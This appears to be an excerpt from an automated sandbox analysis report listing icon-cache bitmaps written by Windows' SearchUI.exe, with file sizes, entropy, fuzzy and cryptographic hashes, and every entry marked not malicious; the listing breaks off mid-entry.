                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.600410387317133
                                                                            Encrypted:false
                                                                            SSDEEP:48:f0ZO820M+ayMepeulAXM587/l9TNz1/nWzVK:fG+0MQMevkM587rnWzV
                                                                            MD5:46749E0919DC3CA91613B12501AD245E
                                                                            SHA1:2E24DACC6F4EBEAA1DAED577697EC1A39AB4F92A
                                                                            SHA-256:AD2C396FF60E2F72284806402D6D6A43B3A4875729B00B7176DF667DEE4AF2C1
                                                                            SHA-512:F3627DC86DAE25C2ACD4AE0890D7D398A0C780327A17A3CEBADC4F92BBDF70128DF4C253860F2037626CFEBB9E88D4E5030ABA930F6E7D240068BDDB95FB738A
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.276909222144692
                                                                            Encrypted:false
                                                                            SSDEEP:48:uDI0GgaT2N4m1DhxTp16+VdxQV9KERRRPglcAaKEuy:uE1gs64mx20QTilUK7y
                                                                            MD5:8B231B0466F9AF179CDDC70F2B67E75E
                                                                            SHA1:661A08E398F68F5C55EBE8FF2CFB95A129133BC5
                                                                            SHA-256:BD9AEA762764ACC1427635A4F153549D5F05DFD6EDED9DB57040242C38CD7E9B
                                                                            SHA-512:987E3766E9820627B75E17E5EF32FB02DFFED23DFF59D602D9DAB8C2825E4305C10EF4A2E02E3AC3B5CE0354D956CFFAEF473900D21E7C390F021B063A2878E7
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.4357632469871415
                                                                            Encrypted:false
                                                                            SSDEEP:96:tf3W49RVwoVPxL7dyn60Vb1QfntaWTF+jy:x3Wi/Lhk60Vb1WtaWTF+
                                                                            MD5:32634BF7F7B43B637151361D3E68BF99
                                                                            SHA1:B1EDC33EB07E7FFAA6E896FF7F49C75FEFE093D9
                                                                            SHA-256:3F073F7C963CE5EBF00D915E6BEFB3290703FF9F4AB45D0C1DDFC3F192B44EE1
                                                                            SHA-512:CA53AA9E640271A10AFFAD3BDCA6754F17D4BE2B6ED6A7DC4E9B0F6E90C173D5E5DFC10ED0A28B4AA26391290E2C596EC8D7B1DC836B9295C49529B75FD4DEFD
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.284701546826446
                                                                            Encrypted:false
                                                                            SSDEEP:48:u/7PdXiFXD6A1f2SrQ+LVkwYJlCWX0W/Y2LEtvK4e/JA1:2PVidD6A1fV0MYeWnevK4ey1
                                                                            MD5:DAC979CE64A7375A52F96CE58DCB8EFD
                                                                            SHA1:7B1C275015764F61CEC316358401B5A24FE8EB3E
                                                                            SHA-256:4E00FAC845009C1A60E097E912C586DAAA8C0419A145811B22774ADD2B88A88F
                                                                            SHA-512:7174FAAD79D3707761747396EF6C7C66FD5D46425B72E5E28F25B9B19C31827B403A96392D764F1A7A97233B0DF0A743DF67E15452C80005EC5678CA151F596B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.45223283296259
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqwdbhY673s8Ig5QUig5Q0eEg5I2WO1Y6Lh6sjWVgtRoxlJoNLYoUvGqzqmSQXtP:eB5IFZF0eEQn/GVGwL801vbt
                                                                            MD5:B46C5B5ADD94D92043A86DFEA9515820
                                                                            SHA1:8099F7ED896DA8CA87AC05AA79158B824C4E4C23
                                                                            SHA-256:2DFF20838D273138C02AB65A748D026C157DF532C601100A3768040AE0371072
                                                                            SHA-512:7721F7E75E1A8CA63AF68C2C3E2CFABE494726F93CC9EF0736A3C21DB7E6A3F3E67250A6647EEE56D6CFE57721C1E8A5505091698F8C81B62EFFB64348B5DA83
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):6.145995148273184
                                                                            Encrypted:false
                                                                            SSDEEP:48:BjKwH9dvJFNmQEJ4p23gE4OzjTHTWIzeHcgv3JJ5f/S4VseYtpOe8xo2jJLgTek:BxHHnYQE2lmzjLt4J5nS4mF52jhe
                                                                            MD5:18724742ACF033383C5E3D764B0544FA
                                                                            SHA1:67DD5C314315AE7917C63E59186754508D5A8667
                                                                            SHA-256:D917BF4AB20F41D79A5A7AE1ABE2F1C1D0C32713F9DC8B6628D1C7B055B97B33
                                                                            SHA-512:35247969C929DB6D1BE013482CDE98AA20662F553E6CFC74E42E40E0B30BF25920196E32BCFCCE6F558056ACB79C55039C053AA072BCC1E686267DD5FC277B5A
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.052526408399854
                                                                            Encrypted:false
                                                                            SSDEEP:48:ROsWYUiXX5IHauiVAc1cANeojm6i14qyLt49+4mtJtQNv2PPzw8WeTxux:RJWYUCXipiVAcbTjHU4H54of0unzZTY
                                                                            MD5:840E9B50C5995D52FB0983CD357540C9
                                                                            SHA1:CB26F4EDE03144AFB860F85CD11722AEE42CBEA3
                                                                            SHA-256:030F22E0F9DEE6ADDE03838466ABDC601389A2C0651243BCB4D42B005436E66B
                                                                            SHA-512:54ADCCABB46E085F51638B9C5808A85C4CC491FB346AC96D7939CF8AE0195CDFBBD1B96ACB87A9B6D1328B8A82C4D3CEDE0B7FA1C400BD995FEA3FA87C96E5D3
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.088453059467796
                                                                            Encrypted:false
                                                                            SSDEEP:48:ZiAnElxq8KP7+u56i5E83wq8YDsQJ3bNaCnDsIcI5fPSeybrPqLiTSVUK8Eh3/1M:ZPMxq8KjhQ2VAq6SJakIMHLiGqvKtM
                                                                            MD5:BDEF02CC4A35B22C376A8B49D27F5A84
                                                                            SHA1:13E5858B6B9BEA305DD43DB209DC207983343F3E
                                                                            SHA-256:2EA7836171B129BBEF9F19A8DABDA506FF1CBDD7625031C0C6A6728FA4DB77B3
                                                                            SHA-512:3D6FB07B98E88BDF5A13E67A88FA6AEC587F3D97EEF6CBE95BAF229FE02962F04AD4564A8FAEEE5EE1D752CB33BB32A8345D643A2D2806641873D0AF21957A93
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.5620136320188625
                                                                            Encrypted:false
                                                                            SSDEEP:48:FaiG004jZZlxpG8ab7526db0E5tUnV11NkwaJmrQythZbbQ8aDBVaX:bGWxobbl26z7UVXNkwaMj/bkD/aX
                                                                            MD5:9186930C3396D7F9C98230FB85E3864D
                                                                            SHA1:D1E3D8CD7F42424B72BEB322DB408EB7CBFF1E22
                                                                            SHA-256:494AAEC6F7938BD17326A7A98894BD65A7C2151A63AF5EF616EF60A1192371E9
                                                                            SHA-512:5A2D99F197970CCE229DE25444BA469EB486843029ADE342652C06F69531E034B2D26B359703A41EBCC687F143AE7340FEE7F501D7CF58F34F7C4C73C9CA9644
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.574720537164326
                                                                            Encrypted:false
                                                                            SSDEEP:48:FaiG004AZZaxKGpgbb/e/akwMeQOqlF1XInk/XKwTtQW9mBaZhBVaX:bG8x7F/NwDQOanXInEX7vHZh/aX
                                                                            MD5:DF59B8ED42BD98D68F689A62E1C3D18C
                                                                            SHA1:2B995ADC2673F7DDB2BCCFAE7FB067A3FDEB5065
                                                                            SHA-256:6DC707B804F108D109BE5CAEC28A91E2342B7FA250E991DF91657CB172335F08
                                                                            SHA-512:3E5D05FC624E955777B33C922F79172C03158B6CD355608E65ABD9CB17929EC491E692973B80A7470188F504DE19EE208AD3351DA3C82D0A9ED825695692EC2E
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.856666835751707
                                                                            Encrypted:false
                                                                            SSDEEP:48:EqY9q7wzWBgBEd1LIW8a0hLNxX5Lajc0gLHRYJJa0xYKTYy9nva:ERW5n81hHX5LaA0gaJEuyy9
                                                                            MD5:E4E9605070A88A73D9FF9C2C94A1AAD8
                                                                            SHA1:ED40D92E073FBF1617363D73085812132F2B43DE
                                                                            SHA-256:8052102AC0C33CFB06E5FA5B99A4691CB6E1412B11189899378F60F8C06C7F31
                                                                            SHA-512:6E37E28E09A017AA30779819FFD471DBCA40E927C02A43F873C9B801384B30860C090DF0F5143BFA4AD7EC1204BF844AA28B5ACDC35BC6D6CDE97AE0764527E6
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.794830085332289
                                                                            Encrypted:false
                                                                            SSDEEP:48:gGTvRlWE2iK5/QfIhWaDEipT5FxHcmIDTGO/S2b7o25mEgbrxVASniS0NR+Svnfz:ZvPW9UCDEETXxHa/zoLE8SEiJ3p
                                                                            MD5:96C4B71837E344480CAE3873F41ACD84
                                                                            SHA1:E9CD6EBE79D6582E3248332193414E81109EF0BF
                                                                            SHA-256:7B97812F16AA171F350925A1BD9CD5FB74CFB023F18DCFE0B5D6916E7CFEE243
                                                                            SHA-512:E08AC6B6CE99F52D3094BFB23D648F29D9A2131E5D7F3C9E8E787FB864DDD14A8313DF14563348C0F2649FAD60F4E17F8742B31576191170B7B9C82B2CA9F58E
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.5201508204213345
                                                                            Encrypted:false
                                                                            SSDEEP:48:lEq0jDiXod9ho/57JGWWzm6NtDza2hc0FUdP6I6lX2wu73IIVJW4:SqQGYd98bctDza2hc0FU4X92lrImJW
                                                                            MD5:AB2CCD14DB6FC49B1AF2069025EF72B0
                                                                            SHA1:636EF695094934A06FB412B5AC1F75394085E615
                                                                            SHA-256:B6CC2051032FBB16625F174A8AC3A8AF544E99114702944BB5697DD3B0347756
                                                                            SHA-512:C4CC2DC322B0785640730F970232B5912E94E990BE8E3EC045580C47B9EC42C90D93FB4B4C3CB689C2FA32A1B176B0BEA5D487A08D618C7E4C5FC3A29E940251
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.311504365507399
                                                                            Encrypted:false
                                                                            SSDEEP:48:uBNZ6u475DaODdw7Ib638dQgDzlVH1xizIg3DHWX+H:8NgdZS7Ib/D3HDizIiJ
                                                                            MD5:EA169540ADFB7DA41F5DD22EAC99D0CF
                                                                            SHA1:4CF345571EC4F268D069AC29F79D6D03E1B46D88
                                                                            SHA-256:BAD07B1C37982608A8582B8819B9B59166DB8211704E7506351CC902228CAECC
                                                                            SHA-512:2DCA2464AA7315F6F1833308D0F37F226B949841598D56440837FE9C24A0554D04CDD38E042564E66C77B505C8E56B19C3293580D0F91A69492A202D5E482740
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):2.0116977638696008
                                                                            Encrypted:false
                                                                            SSDEEP:6:+/qtgX/Cu/a1Opay28FuShBa8a8/QKjaUa0aEa0aEa0aEaa/kKXaOa8aOaEaIaO6:+/qYCu/a1OT2nSrnJbnnTbE
                                                                            MD5:FA60778BCC58D6AFB36E78286B61DBCD
                                                                            SHA1:9293FA0451C384075E3A6707A950DEE94FC17CA8
                                                                            SHA-256:7CB6DE76554847A916551F71F8CFD2E56485AC5C51E48CC564C84E21C9B1AB37
                                                                            SHA-512:4FDEBE052DE2B3678C1F6DE71F835BE2DF572C0D463E68CEA076ADF35C6938B7E7B3529A4094875055F3460DC806B7B17C70858D1769CAF7A02F432335637504
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):4.050062546022579
                                                                            Encrypted:false
                                                                            SSDEEP:48:vqHb7RnH5BilE3Ul/JnNbLsRbuBrkJBVA/vQxJvpqdcbWkPNmrc:0J3UXNUkrkTVwQxJBqqbnN
                                                                            MD5:BA031B4BD4AFCFE8D39CA84DF97432C7
                                                                            SHA1:867008C5626908647B9C6BBC9FF891BFDA3E7F12
                                                                            SHA-256:5A96ACB72A7CEA00FEC3DDD5D048E604943AFE16170E67332EC5975083446284
                                                                            SHA-512:BC2F3D3EDD69279A477F32F09FFBCABCECEBCF90D4A413292A4F90F3B4F9B8C523DE14674793B0AC8DDA3065B2FEB3FDB1EE85118C6FC69FCEDF2C4E8CBA8FD9
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.106879650519581
                                                                            Encrypted:false
                                                                            SSDEEP:48:RG1+HrubD3MBhAweiTyJPVufM7bcS3k/NW01+479VJycdy94+kgBT8idre:fHrGjahAuTyVVuU7P0/sna9tdy9VCQe
                                                                            MD5:48DB6F33CC5D842CB72410552A63AE0B
                                                                            SHA1:FDA8AAAE704D25FFB5E8358D95AE325922D09127
                                                                            SHA-256:70B5A9F51A317DFA789514EACE4B1F3FA980B88621174251CC6C1B22C1131A01
                                                                            SHA-512:13C9DF56F6E0C52FAB828078A6D8552560D440E2956969281E15B227470A007E95AFBEC14E965E722F60197922B3AA7DE11F9D9CEEA36E93711FF2073DE2DC7C
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):5.075770694809214
                                                                            Encrypted:false
                                                                            SSDEEP:48:eI/X//scH3MbmVb/A4TSiV2QhbMvivtUm:eqX/kcH3MbmV/TVlhx
                                                                            MD5:1A97F950F591CDFC0E7A147777CE19B2
                                                                            SHA1:C795921A4129586E84867A201CA3147D43938BC2
                                                                            SHA-256:B74EDFEFFC0E6FB1054E39C09C15FC452254D4BD53FAF5D947EBB4CFD62A517C
                                                                            SHA-512:4594CA40B718C1A23C61EE3E0D649AC52421F4416EED46716B11FAEE652117549091BE707C2D71160CD7E1597C6F3E3E52411188253C5D4EA43315727AC04422
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_x64_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Aut2Exe_Aut2exe_x64_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt v3 Website_url
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.237492402645553
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqXjsdB3g6G7OdE5qOppcWfswKnZFwG6uDPvdHk:HsdBg6qjpLkwOEG6QndHk
                                                                            MD5:A9FFA788D43CA6DBFD91F153E8A3974D
                                                                            SHA1:14DF0A56B28F230ED98BC3C0075C9208B41FF807
                                                                            SHA-256:F300BAAE15663E4A4AC43A5BB30A85FCC2E2B40D9B7007A8300873300FCC563B
                                                                            SHA-512:3C5679F8A17180ACC5C22C3A13F00C6D0B13C7EABF37AA27340EBDF2ADF89C376912ADAC8B70C490D5DA97FBEE4F9F6704172D51FCDDF74FF8F8BCC5ABF8C911
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt3_x64_exe
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.906964992469157
                                                                            Encrypted:false
                                                                            SSDEEP:48:yyJv1cZdsqRnRPHDU3SedT8kIltCXjq/My:Zv1cZSyPjU9ikStCzq/
                                                                            MD5:5D7B70550F986FD58C8AF588D9390F92
                                                                            SHA1:729E76EEE747C565041F106878CC71191281B0AD
                                                                            SHA-256:48EBBD5DD1385364FB2FBD2FBE5041F9E06EC88E28155D5BB4CD55F791827D50
                                                                            SHA-512:126A87358816CE860650A63C8F63E1B97FFD35043665A0A77D1B785318ABD88EACDD6293D2E5B1AA91A3280242AC2B371BCFA1D8111CE00570C918013AE4204B
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoItX_ActiveX_VBScript
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):3.237492402645553
                                                                            Encrypted:false
                                                                            SSDEEP:24:cqXjsdB3g6G7OdE5qOppcWfswKnZFwG6uDPvdHk:HsdBg6qjpLkwOEG6QndHk
                                                                            MD5:A9FFA788D43CA6DBFD91F153E8A3974D
                                                                            SHA1:14DF0A56B28F230ED98BC3C0075C9208B41FF807
                                                                            SHA-256:F300BAAE15663E4A4AC43A5BB30A85FCC2E2B40D9B7007A8300873300FCC563B
                                                                            SHA-512:3C5679F8A17180ACC5C22C3A13F00C6D0B13C7EABF37AA27340EBDF2ADF89C376912ADAC8B70C490D5DA97FBEE4F9F6704172D51FCDDF74FF8F8BCC5ABF8C911
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_AutoIt_chm
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:PC bitmap, Windows 98/2000 and newer format, 32 x 32 x 32
                                                                            Category:dropped
                                                                            Size (bytes):4246
                                                                            Entropy (8bit):1.185499439627167
